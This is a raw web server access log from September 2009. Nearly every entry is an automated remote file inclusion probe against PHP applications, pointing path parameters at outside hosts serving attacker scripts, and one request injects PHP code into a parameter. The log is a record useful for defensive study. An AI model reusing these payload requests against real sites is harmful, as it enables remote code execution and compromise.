219.85.63.226 - - [08/Sep/2009:11:09:19 -0500] "GET //hioxRandomAd.php?hm=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
222.236.47.23 - - [08/Sep/2009:11:11:19 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:11:11:19 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:11:11:19 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:11:11:19 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.162 - - [08/Sep/2009:11:11:33 -0500] "GET /logs/access_log.1230508800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.233.69.41 - - [08/Sep/2009:11:12:26 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:11:12:26 -0500] "GET //config/dbutil.bck.php?confdir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:11:12:26 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:11:14:52 -0500] "GET /logs/access_log.1245542400/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:11:14:53 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:11:14:53 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:11:14:53 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:11:14:53 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.43.194.3 - - [08/Sep/2009:11:14:58 -0500] "GET /logs/index.php?dsp=http://dig0z.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 297 "-""-"
208.43.194.3 - - [08/Sep/2009:11:14:58 -0500] "GET /index.php?dsp=http://dig0z.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 292 "-""-"
65.55.207.94 - - [08/Sep/2009:11:17:03 -0500] "GET /logs/access_log.1174262400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.148.68.101 - - [08/Sep/2009:11:23:56 -0500] "GET //snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:24:03 -0500] "GET /logs/access_log.1236211200//snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:24:03 -0500] "GET /logs//snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:13 -0500] "GET /logs//snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:13 -0500] "GET /logs/access_log.1236211200//snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:13 -0500] "GET //snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:14 -0500] "GET //snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:14 -0500] "GET /logs//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:14 -0500] "GET /logs/access_log.1236211200//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:30 -0500] "GET /logs/access_log.1235952000//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:11:25:31 -0500] "GET /logs/access_log.1235952000//snippet.reflect.php?reflect_base=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:54 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:54 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:54 -0500] "GET /logs/access_log.1241913600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:54 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:55 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:25:55 -0500] "GET /logs/access_log.1241913600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:26:14 -0500] "GET /logs/access_log.1247097600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.236.47.188 - - [08/Sep/2009:11:26:15 -0500] "GET /logs//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.188 - - [08/Sep/2009:11:26:15 -0500] "GET /logs/access_log.1236211200//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.188 - - [08/Sep/2009:11:26:15 -0500] "GET //snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:11:26:17 -0500] "GET /logs/access_log.1247097600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
66.135.42.157 - - [08/Sep/2009:11:26:24 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://cr0d.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 300 "-""-"
66.135.42.157 - - [08/Sep/2009:11:26:24 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://cr0d.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 305 "-""-"
222.236.47.188 - - [08/Sep/2009:11:26:33 -0500] "GET /logs/access_log.1235952000//snippet.reflect.php?reflect_base=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:11:27:00 -0500] "GET /logs/access_log.1232755200%20%20//config/dbutil.bck.php?confdir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:11:27:02 -0500] "GET /logs/access_log.1241913600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:11:27:02 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:11:27:02 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:11:27:03 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:11:27:03 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:11:27:03 -0500] "GET /logs/access_log.1241913600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:11:27:30 -0500] "GET /logs/access_log.1247097600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:11:27:30 -0500] "GET /logs/access_log.1247097600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:11:27:50 -0500] "GET /logs/access_log.1236211200//config/dbutil.bck.php?confdir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:11:28:38 -0500] "GET /logs//main.php?page=http://bt.street-peppers.ru/cmss/baner.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:11:28:38 -0500] "GET //main.php?page=http://bt.street-peppers.ru/cmss/baner.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:11:28:38 -0500] "GET /logs/access_log.1233705600//main.php?page=http://bt.street-peppers.ru/cmss/baner.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:11:28:38 -0500] "GET /logs/access_log.1244505600//main.php?page=http://bt.street-peppers.ru/cmss/baner.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.206 - - [08/Sep/2009:11:29:02 -0500] "GET /logs/access_log.1146700800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.111.80.234 - - [08/Sep/2009:11:31:08 -0500] "GET /logs/access_log.1241222400//xoops_lib/modules/protector/notification.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pyungan.or.kr/bbs/user/idk2.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
78.111.80.234 - - [08/Sep/2009:11:31:09 -0500] "GET //xoops_lib/modules/protector/notification.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pyungan.or.kr/bbs/user/idk2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
78.111.80.234 - - [08/Sep/2009:11:31:09 -0500] "GET /logs//xoops_lib/modules/protector/notification.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pyungan.or.kr/bbs/user/idk2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
209.92.156.53 - - [08/Sep/2009:11:31:14 -0500] "GET /logs/index.php?inhalt=http://dig0z.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 297 "-""-"
209.92.156.53 - - [08/Sep/2009:11:31:14 -0500] "GET /index.php?inhalt=http://dig0z.altervista.org/bovsp.txt?&mode=id HTTP/1.1" 404 292 "-""-"
82.151.132.176 - - [08/Sep/2009:11:33:24 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice!php?shop_this_skin_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:33:24 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice!php?shop_this_skin_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:33:24 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice!php?shop_this_skin_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.189.39.159 - - [08/Sep/2009:11:33:31 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.189.39.159 - - [08/Sep/2009:11:33:31 -0500] "GET //?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.189.39.159 - - [08/Sep/2009:11:33:33 -0500] "GET /logs//?_zb_path=http://buajul.fileave.com/id.txt? HTTP/1.1" 200 204202 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:11:35:43 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:11:35:43 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:11:35:43 -0500] "GET /logs/access_log.1236211200//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:37:31 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice!php?shop_this_skin_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
174.37.136.126 - - [08/Sep/2009:11:38:16 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
174.37.136.126 - - [08/Sep/2009:11:38:16 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.37.136.126 - - [08/Sep/2009:11:38:16 -0500] "GET /logs/access_log.1236211200//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
174.37.136.126 - - [08/Sep/2009:11:38:37 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:40:00 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:40:00 -0500] "GET /logs/access_log.1246320000//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:40:00 -0500] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:40:00 -0500] "GET /logs/access_log.1246492800//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:43:04 -0500] "GET //e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:43:04 -0500] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:43:04 -0500] "GET /logs/access_log.1246320000//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:11:43:04 -0500] "GET /logs/access_log.1246492800//e107/e107_handlers/secure_img_render.php?p=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
94.23.208.154 - - [08/Sep/2009:11:46:30 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://beautyengg.com/README?? HTTP/1.0" 404 316 "-""Mozilla/5.0"
94.23.208.154 - - [08/Sep/2009:11:46:30 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://beautyengg.com/README?? HTTP/1.0" 404 294 "-""Mozilla/5.0"
94.23.208.154 - - [08/Sep/2009:11:46:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://beautyengg.com/README?? HTTP/1.0" 404 289 "-""Mozilla/5.0"
65.18.168.84 - - [08/Sep/2009:11:47:00 -0500] "GET /logs//main.php?sayfa=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
65.18.168.84 - - [08/Sep/2009:11:47:00 -0500] "GET //main.php?sayfa=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
94.23.208.154 - - [08/Sep/2009:11:47:52 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://beautyengg.com/README?? HTTP/1.0" 404 316 "-""Mozilla/5.0"
66.135.42.157 - - [08/Sep/2009:11:50:20 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://cr0d.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 341 "-""-"
66.135.42.157 - - [08/Sep/2009:11:50:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://cr0d.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 336 "-""-"
62.119.28.103 - - [08/Sep/2009:11:52:38 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
62.119.28.103 - - [08/Sep/2009:11:52:38 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
65.55.106.158 - - [08/Sep/2009:11:53:33 -0500] "GET /logs/access_log.1214179200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.110 - - [08/Sep/2009:11:54:33 -0500] "GET /logs/access_log.1133049600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.18.168.84 - - [08/Sep/2009:11:57:02 -0500] "GET /?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
65.18.168.84 - - [08/Sep/2009:11:57:03 -0500] "GET /logs/?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 200 204197 "-""libwww-perl/5.805"
65.18.168.84 - - [08/Sep/2009:11:58:12 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.18.168.84 - - [08/Sep/2009:11:58:12 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt?????? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
91.191.173.120 - - [08/Sep/2009:11:58:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:11:58:24 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:11:58:24 -0500] "GET /logs/access_log.1242691200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:11:58:24 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:59:52 -0500] "GET /logs//config/dbutil!bck!php?confdir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:59:52 -0500] "GET //config/dbutil!bck!php?confdir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:11:59:52 -0500] "GET /logs/access_log.1236038400//config/dbutil!bck!php?confdir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:11 -0500] "GET //setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:11 -0500] "GET /logs//setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:14 -0500] "GET /logs/access_log.1240531200//setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:41 -0500] "GET //setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:41 -0500] "GET /logs//setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:41 -0500] "GET /logs/access_log.1234828800//setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:12:00:45 -0500] "GET /logs/access_log.1240531200//setup.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:12:00:53 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:12:00:53 -0500] "GET //components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:12:00:57 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:12:00:57 -0500] "GET //components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
65.55.106.139 - - [08/Sep/2009:12:01:08 -0500] "GET /logs/access_log.1127779200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.29 - - [08/Sep/2009:12:02:38 -0500] "GET /logs/access_log.1175817600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.137.160.12 - - [08/Sep/2009:12:03:19 -0500] "GET /logs/access_log.1248048000//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:12:03:19 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:12:03:19 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:12:03:19 -0500] "GET /logs/access_log.1247356800//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:12:04:29 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:12:04:30 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:12:04:30 -0500] "GET /logs/access_log.1247270400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:12:04:36 -0500] "GET /logs/access_log.1232755200%20%20//config/dbutil!bck!php?confdir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.107 - - [08/Sep/2009:12:04:37 -0500] "GET /logs/access_log.1134259200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.91.139 - - [08/Sep/2009:12:04:42 -0500] "GET /logs/access_log.1247875200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
